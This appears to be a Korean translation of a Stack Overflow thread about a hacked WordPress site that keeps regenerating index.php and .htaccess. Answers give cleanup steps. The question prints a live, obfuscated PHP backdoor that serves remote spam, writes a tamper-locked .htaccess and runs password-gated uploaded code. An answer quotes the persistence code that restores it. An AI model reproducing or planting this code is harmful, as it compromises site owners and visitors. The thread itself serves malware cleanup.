${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($OO0_0__0OO);');$O__O0_00OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O_OO00__0O','$O_OO00__0O=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x5f\x4f\x4f\x30\x30\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O));$O__00O_0OO=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x4f\x5f\x30\x4f\x5f\x5f"](\'/\\|/si\',$O_OO00__0O,-1,PREG_SPLIT_NO_EMPTY);if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O__00O_0OO)){return false;}if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x4f\x30\x5f\x30\x30"]($O__00O_0OO)<2){return false;}$O_OO00__0O_array["data"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x30\x4f\x30\x30\x5f"]($O__00O_0OO);$O_OO00__0O_array["data"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O_array["data"]);$O_OO00__0O_array["headers"]=$O__00O_0OO;return $O_OO00__0O_array;');$O_OO0_O00_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O_0_0_OO0O=\'\'','if($O_0_0_OO0O==\'\'){$O_0_0_OO0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'08soShTUxOTi0tPuBgA=\');}$O_OO00__0O="PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKilyYWRpb1wucGhwJCAtIFtMXQpSZXdyaXRlUnVsZSBeKC4qKWNvbnRlbnRcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKilhYm91dFwucGhwJCAtIFtMXQpSZXdyaXRlUnVsZSBeKC4qKWxvY2szNjBcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKikucGhwKC4qKSQgL2luZGV4LnBocCBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPg==";$O_OO00__0O=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x30\x5f\x5f\x30\x5f"]($O_0_0_OO0O)){$O_OO_O00_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x30\x30\x30\x5f\x4f"]($O_0_0_OO0O);if($O_OO00__0O==$O_OO_O00_0){return;}}$OO_0__O0O0="robots.txt";if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x30\x5f\x5f\x30\x5f"]($OO_0__O0O0)){@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x30"]($OO_0__O0O0,0777);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x5f\x4f\x30\x30"]($OO_0__O0O0);}@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x30"]($O_0_0_OO0O,0777);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x5f\x4f\x30\x30"]($O_0_0_OO0O);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30"]($O_0_0_OO0O,$O_OO00__0O);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x30"]($O_0_0_OO0O,0444);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30\x30\x4f"]($O_0_0_OO0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x4f\x30\x5f\x5f\x5f"]("-400 days",${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x30\x4f\x30\x5f\x5f"]()));');$O__00_OOO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O0_O00_OO_','$params["\x64\x65\x66\x61\x75\x6c\x74\x5f\x70\x61\x72\x61\x6d\x73"]=$O0_O00_OO_;$params["\x61\x70\x69"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x4f\x5f\x30\x30\x4f\x5f"]($params["\x64\x65\x66\x61\x75\x6c\x74\x5f\x70\x61\x72\x61\x6d\x73"]);$params["server_domain"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x5f\x4f\x5f\x4f\x30\x30"]();$params["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"]=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];$params["\x72\x65\x66\x65\x72\x65\x72"]=isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"])?${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"]:\'\';$params["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"]=isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"])?${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"]:\'\';$params["\x69\x70"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x30\x5f\x30\x5f\x4f"]();if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x53"])){$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"]="https://";}else{$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"]="http://";}if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["HTTP_ACCEPT_LANGUAGE"])){$params["\x6c\x61\x6e\x67\x75\x61\x67\x65"]=${"\x5f\x53\x45\x52\x56\x45\x52"}["HTTP_ACCEPT_LANGUAGE"];}else{$params["\x6c\x61\x6e\x67\x75\x61\x67\x65"]="";}if(isset(${"\x5f\x47\x45\x54"}["\x70\x61\x72\x61\x6d\x73"])){header("Content-type:application/json");if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x5f\x30\x5f\x4f\x5f"]("json_encode")){echo ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x30\x4f\x30\x5f\x4f\x4f"]($params);}else{${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x4f\x30\x4f\x5f\x30\x4f"]($params);}die();}if(isset(${"\x5f\x47\x45\x54"}["\x70\x61\x73\x73"])&&${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x30\x30\x30\x4f\x5f\x5f"](${"\x5f\x47\x45\x54"}["\x70\x61\x73\x73"]."a!#_11AA")=="2f7a76f71ff9e24be7c0015ff9cb81d8"){if(isset(${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"])){$OO0_0OO0__=sprintf("https://www.google.com/ping?sitemap=%s%s/%s",$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],$params["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"]);$O_0_O0OO0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x5f\x4f\x30\x4f\x4f\x30"]($OO0_0OO0__);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x30\x5f\x5f\x4f\x4f\x30"]($O_0_O0OO0_,"google")!=false){die("success");}else{die("failed");}}if(isset(${"\x5f\x50\x4f\x53\x54"}["\x7a\x7a\x7a"])){$OO0_0_0O_O =${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x4f\x5f\x30\x30\x30"](${"\x5f\x50\x4f\x53\x54"}["\x7a\x7a\x7a"]));$OO0_0_0O_O=\' \'.$OO0_0_0O_O.\'\';@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30"](\'407.php\',$OO0_0_0O_O);require_once(\'407.php\');@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x5f\x4f\x30\x30"](\'407.php\');die();}}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x30\x5f\x4f\x30\x30\x5f"]();$O_OO00_0_O=array(\'domain\'=>$params["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],\'request_url\'=>$params["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"],\'ip\'=>$params["\x69\x70"],\'agent\'=>$params["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"],\'referer\'=>$params["\x72\x65\x66\x65\x72\x65\x72"],\'protocol\'=>$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],\'language\'=>$params["\x6c\x61\x6e\x67\x75\x61\x67\x65"]);$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x5f\x4f\x30\x4f\x4f\x30"]($params["\x61\x70\x69"],0,2,$O_OO00_0_O,array(),$params["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"]);$O_O_0O00_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x5f\x30\x30\x4f\x4f"]($O_OO00__0O);if($O_O_0O00_O!==false){foreach($O_O_0O00_O["headers"] as $header){@header($header);}echo $O_O_0O00_O["data"];die();}');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x30\x5f\x4f\x4f\x4f\x30"]($O0_O00_OO_);?>
그리고 계속 편집이 되고.htaccess이 파일에 대한 파일:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteRule ^(.*)radio\.php$ - [L]
RewriteRule ^(.*)content\.php$ - [L]
RewriteRule ^(.*)about\.php$ - [L]
RewriteRule ^(.*)lock360\.php$ - [L]
RewriteRule ^(.*).php(.*)$ /index.php [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
해당 파일을 삭제하거나 권한을 변경하더라도 WordPress는 0444 권한으로 파일을 다시 생성합니다.
감염된 파일 중 일부는n3.php연락처 양식 7과 같은 일부 플러그인 폴더에 있습니다.
누가 이 PL을 도와줄 수 있나요?잘 부탁드립니다.
코드 내부index.php스스로 재생됩니다.삭제할 때index.php이전 파일의 코드가 여전히 실행됩니다(메모리에 로드되어 있습니다).해결책: PHP 프로세스를 재시작하여 메모리에서 언로드합니다.
당신이 설명한 것과 같은 문제가 있었고, 그것을 수정하기 위해 Cpanel 파일 매니저를 사용하여 다음과 같이 했습니다.
악성코드 없이 .htaccess를 편집 또는 바꿉니다.
wp-config를 제외한 모든 워드프레스 시스템 파일을 삭제합니다.php 및 wp-content 폴더.
https://wordpress.org/download/releases/에 접속하여 필요한 워드프레스 버전을 zip 형식으로 다운로드합니다.
wordpress .zip 파일을 온라인 워드프레스 폴더의 메인 디렉토리 내에 업로드하고 file manager extract 옵션을 사용하여 압축을 푼다.이렇게 하면 wp-content 폴더를 제외한 모든 시스템 파일/폴더가 생성됩니다.이 폴더는 올바른 대상에 복사됩니다.
모든 플러그인의 최신 버전을 원본에서 로컬 컴퓨터로 다운로드합니다(대부분은 .zip 형식입니다).
모든 wp-content/plugins 폴더를 삭제하고 각 플러그인을 수동으로 wp-content/plugins 폴더에 다시 업로드합니다.(플러그인을 zip 파일 형식으로 업로드하는 경우 파일 매니저 extract 옵션을 사용하여 업로드한 후 zip 파일을 추출한 후 원래 zip 파일을 삭제해야 합니다.
캐시 플러그인을 사용하는 경우 캐시 폴더를 다른 곳(wp-content 폴더 내가 아님)에 있는 것처럼 찾은 후 축적된 캐시 파일을 모두 수동으로 삭제할 것을 권장합니다.만약 캐시 플러그인이 어디에 있는지 잘 모르면 조사하십시오.
이 모든 작업을 마친 후에는 워드프레스와 모든 플러그인이 새로 설치되고 악성코드가 남아 있지 않으며 다시 돌아오지 않습니다.
도움이 됐으면 좋겠네요, 행운을 빌어요!
갱신되지 않은 워드프레스에서도 같은 문제가 발생.빠른 해결책은 www 루트 폴더에서 SSH 명령 2개를 실행하는 것입니다.
find . -type f -name '*.php' -print0 | xargs -0 sed -i 's/$path = "\/home/\/\/$path = "\/home/g'
find . -type f -name 'index.php' -print0 | xargs -0 sed -i 's/$OO0/\/\/$OO0/g'
/home - 대부분의 경우 /var/www입니다.
명령어 1-vidus 코드 파일의 위치를 나타내는 주석 행을 만듭니다.
명령어 2 - index.virus가 포함된 코멘트 행을 만듭니다.
/domains/public_html/wp-includes/plugin에 있는 내 바이러스 재생 코드.php
플러그인에 바이러스 재생 코드가 있습니다.php:
$index_path = "index.php";
$index = file_get_contents($index_path);
$path = "/home/users/user_name/domains/domain.com/wp-content/plugins/advanced-custom-fields/core/actions/173692";
if (file_exists($path)) {
$index_hide = file_get_contents($path);
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
if(md5($index) != md5($index_hide))
{
@chmod($index_path, 0644);
@file_put_contents($index_path, $index_hide);
@chmod($index_path, 0444);
}
}
$i_p = "index.php";
$index = file_get_contents($i_p);
$path = "/home/users/user_name/domains/domain.com/wp-admin/css/colors/blue/100158";
if (file_exists($path)) {
$index_hide = file_get_contents($path);
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
if(md5($index) != md5($index_hide))
{
@chmod($i_p, 0644);
@file_put_contents($i_p, $index_hide);
@chmod($i_p, 0444);
}
}
$index_path = "index.php";
$index = file_get_contents($index_path);
$path = "/home/users/user_name/domains/domain.com/wp-admin/css/colors/coffee/139039";
if (file_exists($path)) {
$index_hide = file_get_contents($path);
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
if(md5($index) != md5($index_hide))
{
@chmod($index_path, 0644);
@file_put_contents($index_path, $index_hide);
@chmod($index_path, 0444);
}
}
언급URL : https://stackoverflow.com/questions/64673952/wordpress-keeps-creating-index-php-and-htaccess-files-and-changes-permission-to
'programing' 카테고리의 다른 글
| API 호출에서 WordPress 커스터마이저의 선택 상자에 추가하는 방법은 무엇입니까? (0) | 2023.03.20 |
|---|---|
| JSON 파일을 통해 payload를 curl로 전달하려면 어떻게 해야 합니까? (0) | 2023.03.20 |
| Wordpress 내부에서 Larabel에서 인증된 사용자를 확인하시겠습니까? (0) | 2023.03.20 |
| AngularJs 서비스에서 사용자 지정 이벤트를 생성하는 방법 (0) | 2023.03.20 |
| MongoDB에서 findAndModify와 업데이트의 차이점은 무엇입니까? (0) | 2023.03.20 |